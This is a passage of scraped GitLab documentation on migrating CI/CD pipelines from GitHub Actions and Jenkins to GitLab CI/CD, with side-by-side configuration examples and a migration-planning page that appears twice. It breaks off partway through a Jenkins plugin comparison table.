remoteuser@remotehost:/remote/directory ``` This example: - Uses the `golang:alpine` container image. - Runs a job for building code. - Stores build executable as artifact. - Runs a second job to deploy to `staging`, which also: - Requires the build job to succeed before running. - Requires the commit target branch `staging`. - Uses the build executable artifact. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' ``` ##### Parallel In both GitHub and GitLab, Jobs run in parallel by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: python-version: runs-on: ubuntu-latest container: python:latest steps: - run: python --version java-version: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: openjdk:latest steps: - run: java -version ``` This example runs a Python job and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In both GitLab and GitHub you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest steps: - run: echo "Building $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] test: runs-on: ubuntu-latest steps: - run: echo "Testing $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] deploy: runs-on: ubuntu-latest steps: - run: echo "Deploying $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - build - test - deploy .parallel-hidden-job: parallel: matrix: - PLATFORM: [linux, mac, windows] ARCH: [x64, x86] build-job: extends: .parallel-hidden-job stage: build script: - echo "Building $PLATFORM for $ARCH" test-job: extends: .parallel-hidden-job stage: test script: - echo "Testing $PLATFORM for $ARCH" deploy-job: extends: .parallel-hidden-job stage: deploy script: - echo "Deploying $PLATFORM for $ARCH" ``` #### Trigger GitHub Actions requires you to add a trigger for your workflow. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. Sample GitHub Actions configuration: ```yaml on: push: branches: - main ``` The equivalent GitLab CI/CD configuration would be: ```yaml rules: - if: '$CI_COMMIT_BRANCH == main' ``` Pipelines can also be [scheduled by using Cron syntax](../pipelines/schedules.md). #### Container Images With GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) by using the [`image`](../yaml/_index.md#image) keyword. For example, in a GitHub Actions `workflow` file: ```yaml jobs: update: runs-on: ubuntu-latest container: alpine:latest steps: - run: apk update ``` In this example the `apk update` command runs in an `alpine:latest` container. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml update-job: image: alpine:latest script: - apk update ``` GitLab provides every project a [container registry](../../user/packages/container_registry/_index.md) for hosting container images. Container images can be built and stored directly from GitLab CI/CD pipelines. For example: ```yaml stages: - build build-image: stage: build variables: IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker build -t $IMAGE . - docker push $IMAGE ``` #### Variables In GitLab, we use the `variables` keyword to define different [CI/CD variables](../variables/_index.md) at runtime. Use variables when you need to reuse configuration data in a pipeline. You can define variables globally or per job. For example, in a GitHub Actions `workflow` file: ```yaml env: NAME: "fern" jobs: english: runs-on: ubuntu-latest env: Greeting: "hello" steps: - run: echo "$GREETING $NAME" spanish: runs-on: ubuntu-latest env: Greeting: "hola" steps: - run: echo "$GREETING $NAME" ``` In this example, variables provide different outputs for the jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: ubuntu-latest variables: NAME: "fern" english: variables: GREETING: "hello" script: - echo "$GREETING $NAME" spanish: variables: GREETING: "hola" script: - echo "$GREETING $NAME" ``` Variables can also be set up through the GitLab UI, under CI/CD settings, where you can [protect](../variables/_index.md#protect-a-cicd-variable) or [mask](../variables/_index.md#mask-a-cicd-variable) the variables. Masked variables are hidden in job logs, while protected variables can only be accessed in pipelines for protected branches or tags. For example, in a GitHub Actions `workflow` file: ```yaml jobs: login: runs-on: ubuntu-latest env: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} steps: - run: my-login-script.sh "$AWS_ACCESS_KEY" ``` If the `AWS_ACCESS_KEY` variable is defined in the GitLab project settings, the equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, [GitHub Actions](https://docs.github.com/en/actions/learn-github-actions/contexts) and [GitLab CI/CD](../variables/predefined_variables.md) provide built-in variables which contain data relevant to the pipeline and repository. #### Conditionals When a new pipeline starts, GitLab checks the pipeline configuration to determine which jobs should run in that pipeline. You can use the [`rules` keyword](../yaml/_index.md#rules) to configure jobs to run depending on conditions like the status of variables, or the pipeline type. For example, in a GitHub Actions `workflow` file: ```yaml jobs: deploy_staging: if: contains( github.ref, 'staging') runs-on: ubuntu-latest steps: - run: echo "Deploy to staging server" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml deploy_staging: stage: deploy script: - echo "Deploy to staging server" rules: - if: '$CI_COMMIT_BRANCH == staging' ``` #### Runners Runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed. For example, in a GitHub Actions `workflow` file: ```yaml linux_job: runs-on: ubuntu-latest steps: - run: echo "Hello, $USER" windows_job: runs-on: windows-latest steps: - run: echo "Hello, %USERNAME%" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml linux_job: stage: build tags: - linux-runners script: - echo "Hello, $USER" windows_job: stage: build tags: - windows-runners script: - echo "Hello, %USERNAME%" ``` #### Artifacts In GitLab, any job can use the [artifacts](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: generate_cat: steps: - run: touch cat.txt - run: echo "meow" > cat.txt - uses: actions/upload-artifact@v3 with: name: cat path: cat.txt retention-days: 7 use_cat: needs: [generate_cat] steps: - uses: actions/download-artifact@v3 with: name: cat - run: cat cat.txt ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stage: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt ``` #### Caching A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). For example, in a GitHub Actions `workflow` file: ```yaml jobs: build: runs-on: ubuntu-latest steps: - run: echo "This job uses a cache." - uses: actions/cache@v3 with: path: binaries/ key: binaries-cache-$CI_COMMIT_REF_SLUG ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml cache-job: script: - echo "This job uses a cache." cache: key: binaries-cache-$CI_COMMIT_REF_SLUG paths: - binaries/ ``` #### Templates In GitHub an Action is a set of complex tasks that need to be frequently repeated and is saved to enable reuse without redefining a CI/CD pipeline. In GitLab the equivalent to an action would be a the [`include` keyword](../yaml/includes.md), which allows you to [add CI/CD pipelines from other files](../yaml/includes.md), including template files built into GitLab. Sample GitHub Actions configuration: ```yaml - uses: hashicorp/setup-terraform@v2.0.3 ``` The equivalent GitLab CI/CD configuration would be: ```yaml include: - template: Terraform.gitlab-ci.yml ``` In these examples, the `setup-terraform` GitHub action and the `Terraform.gitlab-ci.yml` GitLab template are not exact matches. These two examples are just to show how complex configuration can be reused. ### Security Scanning features GitLab provides a variety of [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SLDC. You can add these features to your GitLab CI/CD pipeline by using templates. for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure. You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration Steps 1. Migrate Projects from GitHub to GitLab: - (Recommended) You can use the [GitHub Importer](../../user/project/import/github.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` in each project. 1. Migrate GitHub Actions jobs to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation). 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. ### Additional Resources - [Video: How to migrate from GitHub to GitLab including Actions](https://youtu.be/0Id5oMl1Kqs?feature=shared) - [Blog: GitHub to GitLab migration the easy way](https://about.gitlab.com/blog/2023/07/11/github-to-gitlab-migration-made-easy/) If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
https://docs.gitlab.com/ci/plan_a_migration
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/plan_a_migration.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
plan_a_migration.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Plan a migration from another tool to GitLab CI/CD
Migrate from Jenkins, GitHub Actions, and others.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Before starting a migration from another tool to GitLab CI/CD, you should begin by developing a migration plan. Review the advice on [managing organizational changes](#manage-organizational-changes) first for advice on initial steps for larger migrations. Users involved in the migration itself should review the [questions to ask before starting a migration](#technical-questions-to-ask-before-starting-a-migration), as an important technical step for setting expectations. CI/CD tools differ in approach, structure, and technical specifics. While some concepts map one-to-one, others require interactive conversion. It's important to focus on your desired end state instead of strictly translating the behavior of your old tool. ## Manage organizational changes An important part of transitioning to GitLab CI/CD is the cultural and organizational changes that come with the move, and successfully managing them. A few things that organizations have reported as helping: - Set and communicate a clear vision of what your migration goals are, which helps your users understand why the effort is worth it. The value is clear when the work is done, but people need to be aware while it's in progress too. - Sponsorship and alignment from the relevant leadership teams helps with the previous point. - Spend time educating your users on what's different, and share this guide with them. - Finding ways to sequence or delay parts of the migration can help a lot. Importantly though, try not to leave things in a non-migrated (or partially-migrated) state for too long. - To gain all the benefits of GitLab, moving your existing configuration over as-is, including any current problems, isn't enough. Take advantage of the improvements that GitLab CI/CD offers, and update your implementation as part of the transition. ## Technical questions to ask before starting a migration Asking some initial technical questions about your CI/CD needs helps quickly define the migration requirements: - How many projects use this pipeline? - What branching strategy is used? Feature branches? Mainline? Release branches? - What tools do you use to build your code? For example, Maven, Gradle, or NPM? - What tools do you use to test your code? For example JUnit, Pytest, or Jest? - Do you use any security scanners? - Where do you store any built packages? - How do you deploy your code? - Where do you deploy your code? ## Related topics - How to migrate Atlassian Bamboo Server's CI/CD infrastructure to GitLab CI/CD, [part one](https://about.gitlab.com/blog/2022/07/06/migration-from-atlassian-bamboo-server-to-gitlab-ci/) and [part two](https://about.gitlab.com/blog/2022/07/11/how-to-migrate-atlassians-bamboo-servers-ci-cd-infrastructure-to-gitlab-ci-part-two/)
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Plan a migration from another tool to GitLab CI/CD description: Migrate from Jenkins, GitHub Actions, and others. breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Before starting a migration from another tool to GitLab CI/CD, you should begin by developing a migration plan. Review the advice on [managing organizational changes](#manage-organizational-changes) first for advice on initial steps for larger migrations. Users involved in the migration itself should review the [questions to ask before starting a migration](#technical-questions-to-ask-before-starting-a-migration), as an important technical step for setting expectations. CI/CD tools differ in approach, structure, and technical specifics. While some concepts map one-to-one, others require interactive conversion. It's important to focus on your desired end state instead of strictly translating the behavior of your old tool. ## Manage organizational changes An important part of transitioning to GitLab CI/CD is the cultural and organizational changes that come with the move, and successfully managing them. A few things that organizations have reported as helping: - Set and communicate a clear vision of what your migration goals are, which helps your users understand why the effort is worth it. The value is clear when the work is done, but people need to be aware while it's in progress too. - Sponsorship and alignment from the relevant leadership teams helps with the previous point. - Spend time educating your users on what's different, and share this guide with them. - Finding ways to sequence or delay parts of the migration can help a lot. Importantly though, try not to leave things in a non-migrated (or partially-migrated) state for too long. - To gain all the benefits of GitLab, moving your existing configuration over as-is, including any current problems, isn't enough. Take advantage of the improvements that GitLab CI/CD offers, and update your implementation as part of the transition. ## Technical questions to ask before starting a migration Asking some initial technical questions about your CI/CD needs helps quickly define the migration requirements: - How many projects use this pipeline? - What branching strategy is used? Feature branches? Mainline? Release branches? - What tools do you use to build your code? For example, Maven, Gradle, or NPM? - What tools do you use to test your code? For example JUnit, Pytest, or Jest? - Do you use any security scanners? - Where do you store any built packages? - How do you deploy your code? - Where do you deploy your code? ## Related topics - How to migrate Atlassian Bamboo Server's CI/CD infrastructure to GitLab CI/CD, [part one](https://about.gitlab.com/blog/2022/07/06/migration-from-atlassian-bamboo-server-to-gitlab-ci/) and [part two](https://about.gitlab.com/blog/2022/07/11/how-to-migrate-atlassians-bamboo-servers-ci-cd-infrastructure-to-gitlab-ci-part-two/)
https://docs.gitlab.com/ci/jenkins
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/jenkins.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
jenkins.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from Jenkins
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from Jenkins to GitLab CI/CD, you are able to create CI/CD pipelines that replicate and enhance your Jenkins workflows. ## Key similarities and differences GitLab CI/CD and Jenkins are CI/CD tools with some similarities. Both GitLab and Jenkins: - Use stages for collections of jobs. - Support container-based builds. Additionally, there are some important differences between the two: - GitLab CI/CD pipelines are all configured in a YAML format configuration file. Jenkins uses either a Groovy format configuration file (declarative pipelines) or Jenkins DSL (scripted pipelines). - GitLab offers [GitLab.com](../../subscriptions/gitlab_com/_index.md), a multi-tenant SaaS service, and [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. You can also run your own [GitLab Self-Managed](../../subscriptions/self_managed/_index.md) instance. Jenkins deployments must be self-hosted. - GitLab provides source code management (SCM) out of the box. Jenkins requires a separate SCM solution to store code. - GitLab provides a built-in container registry. Jenkins requires a separate solution for storing container images. - GitLab provides built-in templates for scanning code. Jenkins requires 3rd party plugins for scanning code. ## Comparison of features and concepts Many Jenkins features and concepts have equivalents in GitLab that offer the same functionality. ### Configuration file Jenkins can be configured with a [`Jenkinsfile` in the Groovy format](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/). GitLab CI/CD uses a `.gitlab-ci.yml` file by default. Example of a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('hello') { steps { echo "Hello World" } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - hello hello-job: stage: hello script: - echo "Hello World" ``` ### Jenkins pipeline syntax A Jenkins configuration is composed of a `pipeline` block with sections and directives. GitLab CI/CD has similar functionality, configured with YAML keywords. #### Sections | Jenkins | GitLab | Explanation | |----------|----------------|-------------| | `agent` | `image` | Jenkins pipelines execute on agents, and the `agent` section defines how the pipeline executes, and the Docker container to use. GitLab jobs execute on runners, and the `image` keyword defines the container to use. You can configure your own runners in Kubernetes or on any host. | | `post` | `after_script` or `stage` | The Jenkins `post` section defines actions that should be performed at the end of a stage or pipeline. In GitLab, use `after_script` for commands to run at the end of a job, and `before_script` for actions to run before the other commands in a job. Use `stage` to select the exact stage a job should run in. GitLab supports both `.pre` and `.post` stages that always run before or after all other defined stages. | | `stages` | `stages` | Jenkins stages are groups of jobs. GitLab CI/CD also uses stages, but it is more flexible. You can have multiple stages each with multiple independent jobs. Use `stages` at the top level to the stages and their execution order, and use `stage` at the job level to define the stage for that job. | | `steps` | `script` | Jenkins `steps` define what to execute. GitLab CI/CD uses a `script` section which is similar. The `script` section is a YAML array with separate entries for each command to run in sequence. | #### Directives | Jenkins | GitLab | Explanation | |---------------|----------------|-------------| | `environment` | `variables` | Jenkins uses `environment` for environment variables. GitLab CI/CD uses the `variables` keyword to define CI/CD variables that can be used during job execution, but also for more dynamic pipeline configuration. These can also be set in the GitLab UI, under CI/CD settings. | | `options` | Not applicable | Jenkins uses `options` for additional configuration, including timeouts and retry values. GitLab does not need a separate section for options, all configuration is added as CI/CD keywords at the job or pipeline level, for example `timeout` or `retry`. | | `parameters` | Not applicable | In Jenkins, parameters can be required when triggering a pipeline. Parameters are handled in GitLab with CI/CD variables, which can be defined in many places, including the pipeline configuration, project settings, at runtime manually through the UI, or API. | | `triggers` | `rules` | In Jenkins, `triggers` defines when a pipeline should run again, for example through cron notation. GitLab CI/CD can run pipelines automatically for many reasons, including Git changes and merge request updates. Use the `rules` keyword to control which events to run jobs for. Scheduled pipelines are defined in the project settings. | | `tools` | Not applicable | In Jenkins, `tools` defines additional tools to install in the environment. GitLab does not have a similar keyword, as the recommendation is to use container images prebuilt with the exact tools required for your jobs. These images can be cached and can be built to already contain the tools you need for your pipelines. If a job needs additional tools, they can be installed as part of a `before_script` section. | | `input` | Not applicable | In Jenkins, `input` adds a prompt for user input. Similar to `parameters`, inputs are handled in GitLab through CI/CD variables. | | `when` | `rules` | In Jenkins, `when` defines when a stage should be executed. GitLab also has a `when` keyword, which defines whether a job should start running based on the status of earlier jobs, for example if jobs passed or failed. To control when to add jobs to specific pipelines, use `rules`. | ### Common configurations This section goes over commonly used CI/CD configurations, showing how they can be converted from Jenkins to GitLab CI/CD. [Jenkins pipelines](https://www.jenkins.io/doc/book/pipeline/) generate automated CI/CD jobs that are triggered when certain event take place, such as a new commit being pushed. A Jenkins pipeline is defined in a `Jenkinsfile`. The GitLab equivalent is the [`.gitlab-ci.yml` configuration file](../yaml/_index.md). Jenkins does not provide a place to store source code, so the `Jenkinsfile` must be stored in a separate source control repository. #### Jobs Jobs are a set of commands that run in a set sequence to achieve a particular result. For example, build a container then deploy it to production, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('build') { agent { docker 'golang:alpine' } steps { apk update go build -o bin/hello } post { always { archiveArtifacts artifacts: 'bin/hello' onlyIfSuccessful: true } } } stage('deploy') { agent { docker 'golang:alpine' } when { branch 'staging' } steps { echo "Deploying to staging" scp bin/hello remoteuser@remotehost:/remote/directory } } } } ``` This example: - Uses the `golang:alpine` container image. - Runs a job for building code. - Stores the built executable as an artifact. - Adds a second job to deploy to `staging`, which: - Only exists if the commit targets the `staging` branch. - Starts after the build stage succeeds. - Uses the built executable artifact from the earlier job. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' artifacts: paths: - bin/hello ``` ##### Parallel In Jenkins, jobs that are not dependent on previous jobs can run in parallel when added to a `parallel` section. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Parallel') { parallel { stage('Python') { agent { docker 'python:latest' } steps { sh "python --version" } } stage('Java') { agent { docker 'openjdk:latest' } when { branch 'staging' } steps { sh "java -version" } } } } } } ``` This example runs a Python and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In GitLab you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. Jenkins runs the matrix sequentially. For example, in a `Jenkinsfile`: ```groovy matrix { axes { axis { name 'PLATFORM' values 'linux', 'mac', 'windows' } axis { name 'ARCH' values 'x64', 'x86' } } stages { stage('build') { echo "Building $PLATFORM for $ARCH" } stage('test') { echo "Building $PLATFORM for $ARCH" } stage('deploy') { echo "Building $PLATFORM for $ARCH" } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - build - test - deploy .parallel-hidden-job: parallel: matrix: - PLATFORM: [linux, mac, windows] ARCH: [x64, x86] build-job: extends: .parallel-hidden-job stage: build script: - echo "Building $PLATFORM for $ARCH" test-job: extends: .parallel-hidden-job stage: test script: - echo "Testing $PLATFORM for $ARCH" deploy-job: extends: .parallel-hidden-job stage: deploy script: - echo "Testing $PLATFORM for $ARCH" ``` #### Container Images In GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) using the [image](../yaml/_index.md#image) keyword. For example, in a `Jenkinsfile`: ```groovy stage('Version') { agent { docker 'python:latest' } steps { echo 'Hello Python' sh 'python --version' } } ``` This example shows commands running in a `python:latest` container. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml version-job: image: python:latest script: - echo "Hello Python" - python --version ``` #### Variables In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any environment { NAME = 'Fern' } stages { stage('English') { environment { GREETING = 'Hello' } steps { sh 'echo "$GREETING $NAME"' } } stage('Spanish') { environment { GREETING = 'Hola' } steps { sh 'echo "$GREETING $NAME"' } } } } ``` This example shows how variables can be used to pass values to commands in jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` Variables can also be [set in the GitLab UI, in the CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). In some cases, you can use [protected](../variables/_index.md#protect-a-cicd-variable) and [masked](../variables/_index.md#mask-a-cicd-variable) variables for secret values. These variables can be accessed in pipeline jobs the same as variables defined in the configuration file. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Example Username/Password') { environment { AWS_ACCESS_KEY = credentials('aws-access-key') } steps { sh 'my-login-script.sh $AWS_ACCESS_KEY' } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login-job: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, GitLab CI/CD makes [predefined variables](../variables/predefined_variables.md) available to every pipeline and job which contain values relevant to the pipeline and repository. #### Expressions and conditionals When a new pipeline starts, GitLab checks which jobs should run in that pipeline. You can configure jobs to run depending on factors like the status of variables, or the pipeline type. For example, in a `Jenkinsfile`: ```groovy stage('deploy_staging') { agent { docker 'alpine:latest' } when { branch 'staging' } steps { echo "Deploying to staging" } } ``` In this example, the job only runs when the branch we are committing to is named `staging`. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml deploy_staging: stage: deploy script: - echo "Deploy to staging server" rules: - if: '$CI_COMMIT_BRANCH == staging' ``` #### Runners Like Jenkins agents, GitLab runners are the hosts that run jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own runners. To convert a Jenkins agent for use with GitLab CI/CD, uninstall the agent and then [install and register a runner](../runners/_index.md). Runners do not require much overhead, so you might be able to use similar provisioning as the Jenkins agents you were using. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed. For example, in a `Jenkinsfile`: ```groovy pipeline { agent none stages { stage('Linux') { agent { label 'linux' } steps { echo "Hello, $USER" } } stage('Windows') { agent { label 'windows' } steps { echo "Hello, %USERNAME%" } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml linux_job: stage: build tags: - linux script: - echo "Hello, $USER" windows_job: stage: build tags: - windows script: - echo "Hello, %USERNAME%" ``` #### Artifacts In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for example for testing or deployment. For example, in a `Jenkinsfile`: ```groovy stages { stage('Generate Cat') { steps { sh 'touch cat.txt' sh 'echo "meow" > cat.txt' } post { always { archiveArtifacts artifacts: 'cat.txt' onlyIfSuccessful: true } } } stage('Use Cat') { steps { sh 'cat cat.txt' } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt artifacts: paths: - cat.txt ``` #### Caching A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). Jenkins core does not provide caching. For example, in a `.gitlab-ci.yml` file: ```yaml cache-job: script: - echo "This job uses a cache." cache: key: binaries-cache-$CI_COMMIT_REF_SLUG paths: - binaries/ ``` ### Jenkins plugins Some functionality in Jenkins that is enabled through plugins is supported natively in GitLab with keywords and features that offer similar functionality. For example: | Jenkins plugin | GitLab feature | |-----------------------------------------------------------------------------------|----------------| | [Build Timeout](https://plugins.jenkins.io/build-timeout/) | [`timeout` keyword](../yaml/_index.md#timeout) | | [Cobertura](https://plugins.jenkins.io/cobertura/) | [Coverage report artifacts](../yaml/artifacts_reports.md#artifactsreportscoverage_report) and [Code coverage](../testing/code_coverage/_index.md) | | [Code coverage API](https://plugins.jenkins.io/code-coverage-api/) | [Code coverage](../testing/code_coverage/_index.md) and [Coverage 